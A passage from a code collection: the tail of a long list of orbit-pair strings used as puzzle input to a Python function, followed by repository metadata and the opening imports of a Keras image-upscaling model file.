'N5X)7NZ',
'34K)W6F',
'7J9)1N1',
'P4D)MY2',
'QHH)Q6S',
'D8V)Z94',
'N13)QJR',
'X5S)XCS',
'VMK)6WF',
'W6D)YXG',
'LM5)YSB',
'4MR)J2F',
'FQC)N64',
'5MZ)1MZ',
'89Z)B16',
'WGM)46N',
'HHV)5HF',
'GH1)4Y8',
'BD7)2LB',
'LBB)6XH',
'272)P8J',
'CLB)YQT',
'9W5)VKK',
'8MH)X3F',
'S36)HDD',
'LYM)NCH',
'1JK)55M',
'432)8M2',
'4YQ)PQ7',
'JJF)WY6',
'SVM)PLB',
'ZNV)5BS',
'XCS)7ZY',
'S56)TQD',
'FMX)MZB',
'KMH)GHG',
'1XP)R9L',
'42L)YW3',
'R4P)Z8W',
'HQD)3J1',
'BYP)7FJ',
'TTQ)9N5',
'H4M)NWB',
'DSN)1FF',
'3R8)73M',
'RQH)Y9B',
'8PY)GD5',
'DCC)JMN',
'S4Z)2MR',
'VQX)F2R',
'TL6)22K',
'8DD)Y25',
'R1Y)KBT',
'PMQ)6PR',
'8NZ)YOU',
'ZG1)9YR',
'Y17)TG5',
'NFG)GJ6',
'8YD)X4M',
'VCK)C6F',
'Q5X)SPH',
'23V)C9H',
'YJV)X3H',
'QCC)KQW',
'G8R)Z9V',
'429)DH4',
'L1W)RKK',
'PP3)BJX',
'BRB)DFD',
'RXQ)7L9',
'62K)3VC',
'93J)KQ2',
'WT4)DVP',
'VWZ)4SM',
'8TK)32R',
'271)SFV',
'C67)4RS',
'LKT)SX9',
'G5Y)DPG',
'G4M)XDM',
'ZSX)MG2',
'W3X)589',
'YP7)2QL',
'XCD)8Q8',
'T9Z)V1P',
'L33)LY3',
'H9K)NKC',
'MPR)QXD',
'6BD)V5Q',
'MXX)1DV',
'MMT)J1T',
'N64)FNK',
'TQD)JBZ',
'H5W)YYS',
'8SL)LFR',
'VZP)DW5',
'ZBW)F1V',
'CK9)FXS',
'TY9)TQ2',
'NWR)TY3',
'6WF)4S1',
'QGY)9RF',
'R39)MHJ',
'19H)HGV',
'NS2)N13',
'8Y5)HT5',
'QG3)1MG',
'HYT)S26',
'72X)HSX',
'CQ7)5Q4',
'2KL)5HD',
'D8Q)RFH',
'KNJ)YDV',
'PQ7)WVW',
'CBH)Y64',
'4WS)8R5',
'TW4)LGW',
'X37)S7J',
'KH2)HYF',
'RFY)L76',
'DNK)GWF',
'HW9)ZKL',
'LLD)8QF',
'4L7)662',
'MG2)YMK',
'GFQ)24H',
'123)Y8L',
'LPD)7MZ',
'5PC)112',
'ZZW)6BD',
'L4L)KV5',
'VFY)DDF',
'Y1D)4BF',
'3H1)R7V',
'DKQ)S3W',
'TXZ)TTQ',
'4KZ)DSN',
'8R5)HGW',
'4XR)8C7',
'DDY)QQD',
'GRQ)P3P',
'YN8)MLK',
'Y1L)K77',
'Z6F)G87',
'4F1)WP1',
'3RN)2MJ',
'GFJ)NM4',
'P2M)C38',
'MPY)QJC',
'3H2)DZ2',
'SBW)JPD',
'PWZ)B1J',
'6R4)MC6',
'Z94)191',
'BLB)J96',
'N8P)L1W',
'JQC)C11',
'RBQ)QFD',
'4PL)KPQ',
'C3V)4Z1',
'J2M)LZN',
'GXL)B1Z',
'63B)QX2',
'WYD)KDC',
'FLB)RG7',
'DYS)26Z',
'L7Q)9W5',
'DN7)ZBW',
'18W)H2H',
'CHN)V4L',
'ZMG)GKD',
'XC4)L91',
'DKQ)6RJ',
'V2B)93X',
'77K)TD6',
'Y8L)GYD',
'PDM)BGW',
'CXJ)2YQ',
'RTT)7J4',
'1TL)CXH',
'NL4)XLL',
'9NJ)RGB',
'NX9)PYQ',
'2DL)S36',
'L9N)KPC',
'JJ8)VGH',
'58Q)8M4',
'12J)MXR',
'1BG)2W8',
'9N9)9LV',
'TDD)NL4',
'46G)8Z6',
'112)KZ1',
'WF7)19Z',
'H2S)CSJ',
'CNL)1ZK',
'FVD)D5R',
'V8R)H9K',
'11G)CCJ',
'K27)DYS',
'2JS)RP2',
'Y64)ZTY',
'22L)BMS',
'N9T)MFH',
'VKC)Z4J',
'T6R)B1D',
'TG8)HHK',
'GJ6)MT7',
'J7F)1L7',
'CV7)WMC',
'47Q)DNP',
'M13)9BL',
'DYF)VFQ',
'LBP)NPD',
'7KR)72X',
'7MJ)GP1',
'TD6)122',
'3W8)KSK',
'QJR)J9G',
'5PK)MMT',
'YPM)K1D',
'Y5Y)DN7',
'1XC)PLQ',
'PHG)FLB',
'7NZ)DWS',
'F6V)L7Q',
'RQV)YP7',
'8V6)X39',
'H7Q)PQJ',
'NR6)L4L',
'B94)W9G',
'3KG)P2B',
'XDS)4TX',
'6RQ)LWK',
'WBW)63D',
'9NW)P7S',
'YHL)3SK',
'S7G)8P3',
'VYV)KCC',
'W5S)3XT',
'5C2)Q2Y',
'PWP)7BL',
'35W)MPP',
'8DJ)5C1',
'H9T)P9C',
'KCC)Y93',
'6YW)4N1',
'PZN)8PK',
'LWH)Z2S',
'2V6)TPH',
'PMC)NPW',
'C4F)MXX',
'P1J)1M6',
'CNY)QSZ',
'KPS)CNY',
'V2N)KPD',
'NLW)6DY',
'SNF)QJX',
'71H)MPR',
'TNR)KBJ',
'DZW)3VW',
'9YM)F9T',
'QBS)4P4',
'MGS)WZR',
'1T8)F42',
'C6F)R1Y',
'QW6)253',
'8PK)79J',
'S7J)KNJ',
'1YX)CGG',
'NFY)8SN',
'CZK)YZ9',
'6QJ)5LK',
'J9M)3JX',
'RDX)WDZ',
'T2G)7M8',
'43S)QGY',
'DDC)JFC',
'HM4)QLV',
'1FT)1TL',
'XDX)SYG',
'4QS)HW9',
'24H)CHM',
'NS9)3KG',
'STW)52W',
'9RF)H89',
'G75)142',
'WDZ)SJQ',
'599)GD6',
'919)JD4',
'FRT)HZ7',
'JB2)NCV',
'V1P)V2B',
'22J)1F6',
'K53)HT8',
'V2T)JJ8',
'2CJ)111',
'GLD)FDK',
'5SG)1KF',
'KQW)8TR',
'5PK)DBF',
'4P4)8PY',
'PP3)DBW',
'XDQ)2KQ',
'4GY)KMG',
'DPY)GTY',
'N8P)QP1',
'4TX)HWP',
'6GY)PF4',
'SGC)Z5J',
'6MS)TXZ',
'T77)L2Y',
'2D4)2CJ',
'J7R)165',
'CDJ)LXT',
'3YZ)QW8',
'3FK)5ZW',
'HSZ)1CN',
'CNY)5VP',
'ZVK)3FX',
'XS4)CTN',
'XBD)7YV',
'D1M)9VP',
'3X7)Q3G',
'LD5)VFM',
'QVZ)HB3',
'F65)2HZ',
'2ZH)5PB',
'SLX)QNF',
'QD8)MNK',
'JPG)SL8',
'Z2S)TKZ',
'61N)QD8',
'GWF)F53',
'V69)4VL',
'1DV)D43',
'6LR)DGM',
'CJL)CXJ',
'HWY)5SG',
'WQ6)LK1',
'YQV)W1L',
'WH5)MB2',
'RVW)KFM',
'CHM)SLX',
'2KB)HWW',
'H5N)7J9',
'MP8)7RB',
'3TL)JSC',
'MXR)P54',
'CXL)LD5',
'TC2)D87',
'XRR)WRG',
'T5C)47K',
'J4N)CYS',
'945)79H',
'Y9B)YKZ',
'W6W)M71',
'VGF)NPY',
'JKS)P48',
'ZDF)FTK',
'RMD)BZ8',
'4K2)W6D',
'GD5)98Q',
'6RJ)TFM',
'BVZ)T64',
'142)LQY',
'WVW)FF1',
'7BL)7R7',
'Y71)NPN',
'B7R)97R',
'Y8V)XS4',
'94R)6RQ',
'1MG)KVH',
'H3C)97J',
'BL6)2KL',
'LNW)VSR',
'3F4)WQ6',
'53B)7XH',
'873)LGT',
'WLY)L6D',
'V88)8V6',
'RG7)16N',
'238)JPY',
'JJ1)6KF',
'J1T)PBN',
'DK7)QH9',
'V7T)75D',
'YPM)D15',
'C2G)K9C',
'3QL)R6N',
'F6D)NXF',
'H8P)5V5',
'R7V)QSQ',
'LK1)RG8',
'YYS)DYF',
'DPG)LPD',
'589)DZQ',
'2HZ)3WY',
'WCD)1RP',
'VGX)2KS',
'GK5)NS2',
'T5C)THM',
'LCP)LFF',
'FF1)QDM',
'QP1)VPH',
'JG9)71H',
'FDK)YD8',
'D5R)3RN',
'CP5)X2G',
'9VP)ZDY',
'L65)1B3',
'2BY)L8T',
'YZ9)L53',
'2MR)1BW',
'PJM)VK7',
'CKH)7B6',
'MRD)9B5',
'X46)VH5',
'8P3)MCF',
'W5Q)RZM',
'KV7)CXL',
'4V6)21R',
'5Q4)CHN',
'B16)G9S',
'PS2)KFG',
'HT5)J9M',
'4TX)9D3',
'S2J)T5C',
'59Q)SYR',
'7J4)Y8D',
'1CN)94R',
'ZV2)5M2',
'6JJ)SCD',
'PPH)1JK',
'44H)CKH',
'TFM)YCW',
'7FJ)277',
'TX7)JRM',
'WL4)6VB',
'22K)JJ1',
'PYQ)TKJ',
'NYJ)PPT',
'C2F)8H5',
'RBF)CL9',
'8BB)Q1C',
'YSV)L93',
'GR6)4H5',
'TWH)659',
'PQ6)9NJ',
'J2M)TG8',
'1MR)ZJZ',
'VW3)PPY',
'P7H)JB2',
'Z8W)ZDF',
'BZ8)6W3',
'5MG)DQ3',
'FXS)4KZ',
'TKZ)M41',
'TB5)H54',
'QM2)54Y',
'B1J)5D7',
'FNK)H99',
'4QG)NLP',
'YTT)5JL',
'713)Y72',
'YCW)4YM',
'X21)N87',
'MPP)HL9',
'LT4)GNP',
'1MJ)SM1',
'NWB)W4M',
'RT5)TTD',
'97J)C95',
'5PB)PX5',
'CJV)WNX',
'6JG)734',
'9VZ)NQJ',
'4HF)YQX',
'VFM)SKQ',
'1JC)NYJ',
'7RG)6BS',
'9KT)1GZ',
'5HF)HCW',
'9CB)VQX',
'2XV)JWF',
'QN3)FNG',
'1N1)NSS',
'PQ6)14Y',
'DH4)6SC',
'DNK)GXL',
'45N)KFX',
'846)WGM',
'443)PQ6',
'XZM)9PN',
'SGC)233',
'YGJ)HQD',
'1BW)Q5X',
'WV9)BSL',
'BMR)MSW',
'6BF)81L',
'19Q)QM2',
'JX4)XP7',
'17G)KPY',
'5C1)16L',
'JG2)DK8',
'R53)Y4H',
'S1T)9H4',
'ZHP)3F4',
'2FP)NC6',
'QG3)6MW',
'6DY)NJ9',
'4L6)D8V',
'PWH)SBW',
'8YK)5HX',
'KW7)4GQ',
'SW7)2D4',
'7P1)JG9',
'ZTT)ZPR',
'GVS)HKG',
'Y71)WHJ',
'1GZ)X46',
'QDM)FBM',
'NX6)MPY',
'NGB)2DL',
'6JG)279',
'T5H)RHT',
'6S4)9PQ',
'NWW)2ZH',
'P5X)X21',
'W3Z)BLB',
'PLB)XTK',
'QSQ)LYY',
'NWB)ZV2',
'2R2)ZVK',
'7XP)KXY',
'PPT)P2L',
'LW1)J3X',
'PWP)61N',
'9VX)Z16',
'VPH)Z6S',
'G9S)V88',
'PR2)ZHQ',
'2N4)YPY',
'HGW)599',
'Z5Z)RC1',
'9N5)CW7',
'726)3ST',
'3SK)5MZ',
'BKR)TWB',
'5Y4)YHR',
'CWY)52X',
'21R)V2N',
'ML8)P1J',
'G4F)6YW',
'F1V)18W',
'VL5)FVY',
'XDS)BF9',
'NT9)W2Z',
'17W)M7J',
'1NJ)862',
'RBF)V2T',
'KTL)VZP',
'71F)XVS',
'CYS)T46',
'9TY)ZDM',
'R4M)Y1D',
'64K)WX7',
'S3W)XBV',
'1Q3)8DD',
'H3V)454',
'HL9)8XN',
'KBJ)T9Z',
'RSF)L38',
'819)JT2',
'TK7)MTZ',
'VK7)HK3',
'HVJ)KV7',
'VBJ)WH5',
'NQ3)DK7',
'YXW)FZ1',
'7R7)8HY',
'5M6)S4T',
'77D)4DC',
'8Q8)DKN',
'GKL)GRQ',
'FZ1)CDJ',
'LQ3)YX5',
'HG3)2XK',
'1B3)Y8V',
'QW8)4QS',
'GD8)6KB',
'JWF)YVT',
'2FW)63R',
'NPS)97X',
'MLW)CWG',
'63R)WT2',
'L66)W2K',
'BJX)TXW',
'TC5)L65',
'GBV)KN7',
'1RP)YN3',
'PX5)NW1',
'X39)GN6',
'DJQ)7QS',
'TNR)XBX',
'QFT)9KT',
'7L9)SNM',
'XT5)MK1',
'31D)X7Y',
'NX6)26R',
'24S)YSV',
'DZQ)TX7',
'F48)4V6',
'L21)9HC',
'MVB)5X5',
'KQ2)6XW',
'Y7D)5G4',
'2XK)PPH',
'3XV)WB7',
'H99)TFK',
'YXG)TL2',
'9BL)JPG',
'L6D)D39',
'SYG)FQC',
'2ND)T2G',
'9X4)8WS',
'3KX)Y81',
'7M9)MJK',
'KXY)P8Z',
'454)9Q8',
'LT2)TDV',
'FVW)FJ5',
'TF7)9PH',
'RHT)6BF',
'MPY)YS9',
'NSS)J5N',
'Y8X)JBQ',
'HHG)4YQ',
'G88)DX7',
'1H9)R25',
'RZ7)LH1',
'NV9)55X',
'8DZ)RVD',
'4KW)TR9',
'Y9G)QDK',
'J2C)DJQ',
'VLB)CCX',
'H8W)PDM',
'HHD)5Y4',
'M9T)Z4W',
'26R)9CB',
'B1D)BXX',
'YWH)CXG',
'TDK)JGY',
'LH1)Y71',
'49V)FXC',
'NRC)BD7',
'N4B)L83',
'253)G4B',
'V5J)19H',
'GLD)JQC',
'73M)5FV',
'HQ3)YHL',
'T46)2NS',
'CW7)2YD',
'HMB)QG3',
'DNP)RDX',
'ZS8)BXK',
'91G)HVJ',
'62M)8VN',
'2VW)PWZ',
'39H)CBH',
'Z6W)6HQ',
'G95)SHK',
'1FF)DX9',
'8HY)8PL',
'8RK)3FV',
'9G5)ZHP',
'B24)XZ5',
'YSB)NWW',
'GVQ)H36',
'YDV)JJF',
'RBB)45N',
'KJK)NX6',
'16N)LYM',
'3VC)17W',
'XYN)CJV',
'JBZ)7KB',
'NM4)YKR',
'GYD)91Z',
'FNG)YJV',
'RZM)TS9',
'MSW)7BH',
'NPY)VQZ',
'NCZ)BKM',
'8H5)C48',
'CL4)7S3',
'6PR)71M',
'PLK)2FP',
'TXW)713',
'NC6)6TM',
'VYZ)XHS',
'WB7)CWY',
'WX7)WF8',
'ZD8)726',
'KS5)QXZ',
'YDW)BVZ',
'KNC)THZ',
'GWQ)GH4',
'9DF)LQB',
'J3H)QHC',
'1ZJ)WFZ',
'WT2)CFW',
'X7Y)9MV',
'GD6)H9R',
'C64)GVQ',
'P2L)KWT',
'K53)JBL',
'7T7)9NW',
'RD5)1MJ',
'TKJ)82P',
'MW4)2DD',
'KVH)WF7',
'MFH)3QL',
'BF9)L34',
'CXJ)87W',
'CPS)Z4L',
'959)38Z',
'Y3L)L7R',
'2YD)T6R',
'NL3)BLT',
'68C)13Y',
'SGM)N5P',
'J2F)SAN',
'Z4J)RXQ',
'6BS)PWH',
'3Y7)31K',
'58B)9N9',
'DTP)C7P',
'38Z)1D3',
'5DV)Q26',
'C95)LM5',
'QSQ)KPS',
'SJQ)QHH',
'8QF)7M9',
'4DC)4MR',
'LSN)H5Q',
'Z83)N11',
'R4G)6MS',
'BP2)4QG',
'47K)PWP',
'F3L)2LM',
'MB3)BRB',
'PPY)DLQ',
'K1D)DZW',
'DLQ)S4K',
'8C7)DPZ',
'GN6)3TL',
'Q57)3FT',
'Q99)63B',
'ZHQ)MGS',
'59D)PHG',
'111)LT2',
'JGY)V69',
'BGW)4PL',
'HT5)11G',
'PX8)HM4',
'CGG)5PK',
'DDF)2SY',
'ZZH)RZ3',
'1LW)SGM',
'S7G)RT5',
'YQF)LB5',
'GP6)8MH',
'7ND)B5L',
'Z66)2C6',
'N1C)DFJ',
'6ZY)VS3',
'P45)5F8',
'V4L)PRD',
'Q56)JX4',
'5HX)RSF',
'FJ5)7CW',
'HK8)1CZ',
'LFF)5CB',
'HT8)8DJ',
'Z6S)QKY',
'GHG)KFD',
'C3C)4K2',
'K7T)5NQ',
'7MZ)P5X',
'3Q2)K72',
'MB2)N1S',
'ZJZ)DYY',
'YG3)LYL',
'T1Y)JSP',
'FHZ)KR6',
'G5Y)6PF',
'NPW)745',
'ZBP)CPC',
'3RG)4QJ',
'HSX)85G',
'TTD)P45',
'RZB)4DS',
'Y4H)478',
'Q5M)9GK',
'G5L)ZJP',
'FXL)WLY',
'8G6)C2G',
'X9R)YQ9',
'FMY)1NJ',
'VH5)77D',
'PF4)CQ7',
'FVY)TWH',
'535)77K',
'F9Q)FXY',
'SBD)L4W',
'QCM)V5J',
'M42)XMH',
'77K)R3W',
'WL1)CL4',
'RFH)XCL',
'3MV)HMB',
'X96)9HT',
'32R)KW7',
'J5N)1T8',
'GJG)C64',
'P2B)J2M',
'13Y)ZZW',
'TDK)3H1',
'X7L)4J9',
'BQB)1DJ',
'PN4)FMH',
'TL3)1LW',
'23S)Z83',
'J34)3X7',
'4QJ)Q68',
'DHD)QTM',
'9FX)PNN',
'CT5)HG9',
'CB3)16K',
'N9Z)6J3',
'SXJ)1LL',
'JSW)ZS8',
'BXP)1H6',
'BSL)9X4',
'5N1)NFH',
'K77)WYN',
'443)4L6',
'8ND)2R8',
'6J3)HHV',
'W7Z)272',
'L83)WTF',
'R3C)8ND',
'6RH)2KG',
'48Z)5P9',
'41P)46G',
'4VL)8V9',
'5F8)CZK',
'Q1C)K84',
'CJL)X37',
'XQ7)GR8',
'846)429',
'5ZS)9G5',
'5BS)PMC',
'F42)419',
'47B)G4F',
'BJ7)8Y5',
'SYR)T1Y',
'CMZ)3FS',
'K7C)432',
'763)1BD',
'FBM)F83',
'MMV)WPB',
'RKK)D7R',
'HDD)6R4',
'GRQ)MRD',
'H3J)RPL',
'W4M)GQQ',
'RYB)5BG',
'5LK)VLB',
'NVJ)SW7',
'CBH)QXM',
'W2Z)NPS',
'Y8D)J4N',
'5QQ)5KF',
'KV5)17G',
'YKZ)6RH',
'SPH)WGN',
'5RD)VKZ',
'7KB)WCD',
'L53)R3C',
'C38)JG2',
'JPY)DHD',
'3ND)53B',
'HJG)B7R',
'GH4)GSJ',
'Y44)24S',
'Y81)3W8',
'4P1)3Q2',
'F9T)873',
'3GQ)8J2',
'Z39)MJL',
'GQQ)9X6',
'QSY)ZZX',
'HH4)JWV',
'6J6)8SL',
'H9R)Y1S',
'P8Z)SFQ',
'8JC)ZBP',
'M41)59Q',
'2MC)9YM',
'454)F4G',
'NBF)V18',
'H2P)PXB',
'7NZ)47M',
'TQ2)PJM',
'1BD)FMX',
'233)Y5C',
'5HF)SF3',
'J3Q)CST',
'8KL)JH8',
'84B)P96',
'2KS)3R8',
'8V2)C2F',
'5ZW)P6C',
'YBR)JTN',
'XQZ)YGJ',
'5X7)CNV',
'31X)7FF',
'8MH)D93',
'JBQ)G4M',
'YMK)TF7',
'279)QWK',
'KFD)YJJ',
'T2M)PGY',
'M8W)HZL',
'31K)VLH',
'RGB)VTV',
'TLC)RR7',
'JTR)XCD',
'BLT)CP9',
'R6N)4WS',
'HCP)Z39',
'Q26)HCP',
'8V9)G4S',
'1H6)X96',
'D7R)TFC',
'WKM)LBB',
'WHJ)MGR',
'JPD)KST',
'5KF)C46',
'W1J)XJ8',
'JHP)NDJ',
'P6C)BX2',
'NFF)QBS',
'P9K)KWF',
'YS9)W7Z',
'GTY)CT5',
'QRN)6JG',
'RR7)NFQ',
'Q2Y)WKM',
'5D7)1BG',
'JCH)ZCK',
'NFQ)D3N',
'N8T)FP7',
'JRM)763',
'2B6)453',
'71V)4P1',
'CNW)513',
'8X2)HH4',
'QTQ)G6V',
'KPY)RBH',
'VKZ)CNL',
'4YM)QZB',
'SHJ)ZS3',
'HGT)HZ8',
'K9Z)2V6',
'41V)H2S',
'TP3)6Q6',
'MVG)WV6',
'1F6)Y49',
'W31)4HF',
'KKQ)BJ7',
'TRT)HJG',
'QXM)TJD',
'JV4)34K',
'DZ2)B24',
'MGR)QKG',
'KN7)XBD',
'BXL)KKL',
'TG5)YWH',
'ZJP)RBQ',
'R4V)T2M',
'DR3)N8P',
'KL6)R4G',
'K7T)VMK',
'3J1)G8D',
'RMV)443',
'451)PR2',
'4D3)Z6W',
'TY3)75X',
'J2D)3YJ',
'WDS)3X2',
'PG8)271',
'S1N)YCX',
'M95)CCM',
'NJ9)Y92',
'VTV)6K2',
'KNM)9JN',
'82P)RTT',
'8J7)31D',
'4J9)MP8',
'4RS)89Z',
'RDK)DPY',
'745)RTP',
'XM7)NPP',
'QLV)4H2',
'VQZ)BWP',
'9DR)XTY',
'Y92)819',
'FTK)NQT',
'67Q)NGB',
'8VF)TL3',
'9TY)KW2',
'NW1)LCP',
'VLH)W2L',
'BXJ)22J',
'CCM)XPT',
'VRH)R84',
'6MW)X7L',
'3L5)MT6',
'2C6)Z2D',
'LWK)4FY',
'RVP)SS6',
'8XN)TL6',
'FSR)5MY',
'NKC)51L',
'M42)RQH',
'SJ2)BMR',
'ZS3)L66',
'KMG)5MG',
'SPH)DR3',
'D6T)2LX',
'JT2)H4M',
'8TR)VW3',
'ZTY)4XR',
'QXZ)8X2',
'VHX)DNK',
'7JR)338',
'P9C)ZQV',
'QJX)2MC',
'79J)1ZJ',
'5M2)9B7',
'QX2)TP3',
'14N)JM4',
'GZV)6LR',
'KKL)XM5',
'THZ)FD6',
'7QS)H2P',
'9H6)VLJ',
'WZR)3QC',
'S97)31X',
'5C1)LNW',
'WYN)SVM',
'4X2)C57',
'4GQ)D6T',
'XN8)QSY',
'26Z)QW6',
'X8G)62K',
'XHS)L33',
'KTY)F65',
'LXT)F9Q',
'CP9)NCZ',
'YCX)WBW',
'NFQ)4X4',
'CCM)X27',
'TWB)91G',
'MFG)KH2',
'VKN)3XV',
'XBV)SJ2',
'P8J)V7V',
'P3P)CPS',
'G7B)8NZ',
'FCH)KQP',
'ZCK)HK8',
'FQV)6QJ',
'F8X)4XK',
'8SQ)3GQ',
'2HZ)K5V',
'JWR)F3L',
'GYD)LZL',
'VSG)T14',
'34K)PTX',
'4WS)VCK',
'H89)RG4',
'S1T)Q56',
'XX2)Z5T',
'H5P)LCG',
'PQ7)RRT',
'CNV)YGQ',
'6DY)M13',
'F16)6TJ',
'HB3)QL7',
'LB9)KKQ',
'HPL)XN8',
'XPX)6Q1',
'2Y7)3QD',
'MLK)4KW',
'GFZ)WSK',
'8SN)GR6',
'6TM)4D3',
'3FV)G5Y',
'PNZ)QK1',
'ZMG)882',
'MJK)9X3',
'QTM)FQV',
'453)N5V',
'P54)MVB',
'MTZ)9VX',
'KV3)SHJ',
'HZ8)MY9',
'4FY)959',
'C48)M42',
'882)9DR',
'55M)NL3',
'CWM)51X',
'QGY)FRF',
'XQZ)Y14',
'X3F)BKR',
'JKS)8G6',
'6KB)FVW',
'2R8)KTY',
'PXB)M9T',
'QH9)6S4',
'YX6)VKC',
'KS5)LKT',
'HK3)4GY',
'97X)9XQ',
'ZP3)NFY',
'HH4)JC6',
'31K)PX8',
'19Q)W3Z',
'763)GFZ',
'DYY)BXL',
'RZ3)5M6',
'L38)Y2L',
'QYS)93J',
'QHC)TB5',
'QLH)V1B',
'D43)YDS',
'JM4)1J9',
'Z4L)Z6F',
'D93)68C',
'1RW)8TK',
'7YV)K7L',
'JD4)RD5',
'5Y4)L97',
'TP3)Q9W',
'SKQ)DQD',
'X4M)VRH',
'CTN)MMM',
'DB7)QP8',
'VG2)1F9',
'LK7)LS4',
'RZ7)4FH',
'LHK)K9Z',
'7B6)3HB',
'659)6ZY',
'1CZ)9W9',
'NPD)PNZ',
'WRG)Q57',
'H5Q)BTD',
'MZB)QN3',
'S7H)NS9',
'6QF)2Y7',
'C51)HG3',
'5RG)QTQ',
'7SW)LB9',
'NRK)CJL',
'D15)F48',
'KBT)5N1',
'YQT)MZX',
'GJ8)J7R',
'4Z1)S5G',
'2QD)5DV',
'4XK)DCC',
'23G)YNX',
'1CN)H3J',
'DX7)8WD',
'COM)DLS',
'5P9)8YK',
'GFB)DB7',
'1LL)S8D',
'BXK)H3C',
'HCW)FHZ',
'2N8)C4F',
'7BH)VGX',
'8VX)CLB',
'H2H)YTM',
'S5G)FFJ',
'122)1BY',
'MY9)1TR',
'1TR)WXH',
'M3P)XZM',
'BJG)C6V',
'L97)QCM',
'FFJ)SVJ',
'KQP)945',
'TR7)RDK',
'S4K)3Y7',
'GBG)TC5',
'8Y5)TY9',
'7S3)KJK',
'K6W)S5N',
'J3X)TNR',
'98Q)DDY',
'DFD)2QD',
'QSZ)43S',
'BRZ)PN4',
'N5P)LLD',
'62Y)S1N',
'TQW)W27',
'X27)9FX',
'DQ3)W1J',
'WJ1)8BZ',
'4Y8)L1C',
'92Q)HVG',
'T64)J7F',
'RKK)S2J',
'8M4)GLD',
'RCJ)2N8',
'HQ6)3MV',
'L6D)C3V',
'71M)Q4M',
'TL2)SXJ',
'1NC)QYS',
'P48)1S7',
'TXW)GYB',
'FXC)W3X',
'85G)XQT',
'7CW)F5R',
'52X)298',
'Q4M)WLP',
'RG8)XQG',
'9W9)BVJ',
'TDV)4MF',
'NLP)N8T',
'W2L)1JC',
'QXD)L9N',
'KSK)ZPF',
'HM4)GJG',
'HVG)FQD',
'D1B)CK9',
'KFG)1H9',
'9DF)6J6',
'HHK)ML8',
'H3J)42L',
'TBQ)HJ8',
'6Q6)71V',
'VG2)PG8',
'KYC)YQV',
'Y93)T5H',
'RG4)RTX',
'814)NRC',
'VQ8)KMH',
'YNX)H5N',
'JM4)JHP',
'CSJ)DYJ',
'LY3)5RD',
'YW3)TDD',
'MHJ)GFQ',
'N11)CV7',
'TX7)GD8',
'ZQV)RMD',
'5NQ)8V2',
'XTY)2BY',
'BXL)1JM',
'FK4)7TY',
'XQG)P31',
'XBX)7KP',
'LYY)T77',
'71H)P9K',
'D6D)L21',
'TFM)BYP',
'L93)YM4',
'BQZ)NLW',
'2XV)4F1',
'K7L)VSG',
'CL9)C51',
'H9T)LGC',
'XDM)Y17',
'VV1)3FK',
'6RQ)JTR',
'1ZK)SGL',
'ZKH)X9R',
'SGK)Y7D',
'NQT)C3C',
'3XV)G7B',
'9D3)48Z',
'5LJ)ZP7',
'SB3)GY1',
'1MZ)H9T',
'NXF)MB3',
'Y7M)6H3',
'WZ8)SNF',
'MN9)N5X',
'3VW)ZMG',
'HKG)GRY',
'3X2)6QF',
'N87)6QS',
'QLT)3H2',
'DKN)ZTT',
'6PF)2N4',
'JSP)21F',
'298)MN9',
'J9G)HQ3',
'YPC)ML6',
'9JN)BT3',
'HJ8)BQZ',
'8W1)H4F',
'FTK)58B',
'DW5)39H',
'KDC)MH7',
'L7R)G1G',
'FGS)RBB',
'4S1)YN8',
'NS2)FK4',
'683)JSW',
'PZN)R4M',
'YX5)VL5',
'BKR)NDV',
'S26)NWQ',
'P4D)7BC',
'8V6)2B6',
'3WY)KV3',
'41S)J34',
'MJL)71F',
'L8T)8J7',
'DPZ)W6W',
'SD7)R39',
'DVP)X1L',
'KPC)ZK8',
'4H2)PRP',
'6H3)XDQ',
'TFC)8YD',
'JC6)GKL',
'W6F)ZD8',
'111)G75',
'9Q1)451',
'XCL)XYN',
'B5L)TDK',
'FRF)47Q',
'XJ8)Y8X',
'BKM)FWK',
'5HD)F87',
'51X)LK7',
'1BY)Z17',
'GSJ)1NC',
'WDX)KTL',
'7L9)41V',
'C11)3MQ',
'2FV)Y9G',
'L34)35W',
'N9C)HQ6',
'GR8)DYB',
'YDS)KS5',
'S82)CWM',
'XBD)STY',
'NQJ)XZT',
'MK1)LBP',
'YPY)S7G',
'3JX)PZN',
'BSF)RCJ',
'KQD)J2C',
'RPL)1Q3',
'WXH)J3Q',
'75D)1XF',
'6J6)6GM',
'Z17)XDS',
'3HB)FCH',
'Y49)H3V',
'P6C)2X7',
'Q35)GH1',
'MY2)JWR',
'2DD)41S',
'V1B)GJ1',
'YK2)KQD',
'9B7)7SW',
'VFQ)PR7',
'6HQ)J2D',
'P7S)Y44',
'F4G)YDW',
'1S7)XX2',
'S5N)WV9',
'D3N)X4K',
'QFD)5JG',
'6VB)7P1',
'Y14)PP3',
'L2Y)LHK',
'V5Q)H5P',
'L4M)9Q1',
'MC6)BFQ',
'14Y)Y5Y',
'QDK)CQ4',
'CHG)7KR',
'LFR)F6V',
'L76)RYB',
'M7J)1Z9',
'QQD)6FT',
'J2F)K6W',
'GP1)VGF',
'H36)P6P',
'YQX)Z5Z',
'SS6)6WG',
'16K)Q35',
'NFG)XM7',
'6KF)M7Q',
'R8L)FVD',
'M7Q)VWZ',
'6WG)N1C',
'3XT)858',
'F2R)K8V',
'T4Y)5X7',
'KP1)XRR',
'NCV)HWY',
'PNN)14N',
'W9G)CZ7',
'2LD)9DF',
'7ZY)PCK',
'1J9)HX2',
'6GM)7XP',
'DLS)NM3',
'DX9)H8P',
'T9C)TRT',
'SL8)2XV',
'CCJ)5BH',
'7FF)TQW',
'PR7)SB3',
'NGB)MMV',
'4S1)N9T',
'DYB)911',
'JBQ)R4P',
'N5V)GK5',
'9LV)KNM',
'YHR)23S',
'TS9)ZKH',
'1KF)Q4H',
'LYL)STW',
'SNM)WZ8',
'8X2)WJ1',
'HLT)8SQ',
'WF8)119',
'LGC)6GY',
'WVW)XGG',
'YD8)2FV',
'THM)WYK',
'PRH)FTZ',
'6Y7)8BB',
'8BZ)R4V',
'FH1)YQF',
'KST)L4M',
'L91)QCC',
'CCX)VYZ',
'YQT)QLT',
'S8D)NR6',
'Y72)HSZ',
'87W)RVP',
'DLQ)1FT',
'2TZ)9TY',
'2KB)YBR',
'K5V)VBJ',
'ZVK)RFY',
'ML6)DLV',
'PS2)23V',
'6MX)WYD',
'5FV)8RK',
'5D7)8VX',
'NWQ)62M',
'QK1)8ZN',
'S7J)K53',
'451)LW1',
], 'YOU', 'SAN'))
``` |
{
"source": "1pkg/neura",
"score": 3
} |
#### File: source/models/convolution_scaled.py
```python
from keras.models import Sequential
from keras.optimizers import Adam
from keras.layers import Conv2D
from .base_scaled import BaseScaled
from .loss_func import psnr_loss
